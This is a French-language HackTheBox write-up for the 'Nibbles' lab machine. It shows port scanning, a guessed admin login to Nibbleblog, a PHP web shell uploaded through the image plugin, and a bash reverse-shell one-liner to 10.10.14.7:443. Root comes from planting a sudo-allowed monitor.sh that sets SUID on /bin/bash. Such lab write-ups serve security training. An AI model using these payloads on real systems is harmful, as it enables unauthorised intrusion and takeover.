Nibbles HackTheBox (Writeup)

Skills:

Abusing Nibbleblog - Remote Code Execution via File Upload
Abusing Sudoers Privilege [Privilege Escalation]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.75 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.10.75 -oN targeted

Port 80 - HTTP

En inspectant le code source de la page web, nous remarquons la présence d'un répertoire /nibbleblog.

Nibbles Blog - CMS

Le site semble être un CMS appelé Nibbleblog. Nous allons utiliser gobuster pour rechercher des répertoires supplémentaires :

gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Recherche de Fichiers PHP :

Lors de la recherche de fichiers PHP, nous trouvons un fichier admin.php qui semble correspondre à un panneau d'administration.

Tentative de Connexion avec des Identifiants :

Nous tentons de nous connecter avec les identifiants suivants :

Utilisateur : admin
Mot de passe : nibbles

Cela fonctionne et nous accédons à l'interface d'administration.

Vulnérabilité Nibbleblog - File Upload

Nous découvrons une fonctionnalité permettant de télécharger des images :

Nous allons créer un fichier cmd.php avec le code suivant pour permettre l'exécution de commandes

<?php
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>

Le fichier sera téléchargé dans le répertoire content, où nous trouvons un sous-dossier private contenant des plugins.

Exécution de Commandes via l'Upload de Fichier :

Grâce au paramètre cmd, nous pouvons exécuter des commandes. Par exemple, nous utilisons l'URL suivante pour obtenir des informations sur l'ID du système :

/image.php?cmd=id

Nous obtenons un accès au serveur via un reverse shell. Nous mettons notre machine en écoute sur le port 443 :

nc -nlvp 443

Puis, nous exécutons le reverse shell sur la machine cible :

bash -c "bash -i >%26 /dev/tcp/10.10.14.7/443 0>%261"

Traitement Terminal :

Dans le terminal, nous effectuons les étapes suivantes pour stabiliser la session :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt :)

Élévation de Privilèges :

Sudo - monitor.sh (no such file)

Nous découvrons une vulnérabilité liée à l'exécution de scripts avec des privilèges sudo.

Le fichier monitor.sh semble être introuvable, mais nous pouvons créer un script qui sera exécuté en tant que root. Nous commençons par créer les répertoires nécessaires :

cd /home/nibbler
mkdir personal
cd !$
mkdir stuff
cd !$

Nous y plaçons le fichier monitor.sh avec le contenu suivant :

chmod u+s /bin/bash

Nous exécutons ensuite le script avec les privilèges sudo :

sudo /home/nibbler/personal/stuff/monitor.sh

Cela permet de modifier les permissions de /bin/bash en lui ajoutant le bit SUID. Nous exécutons alors la commande suivante pour obtenir un shell avec des privilèges root :

bash -p

Flag root.txt :)

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?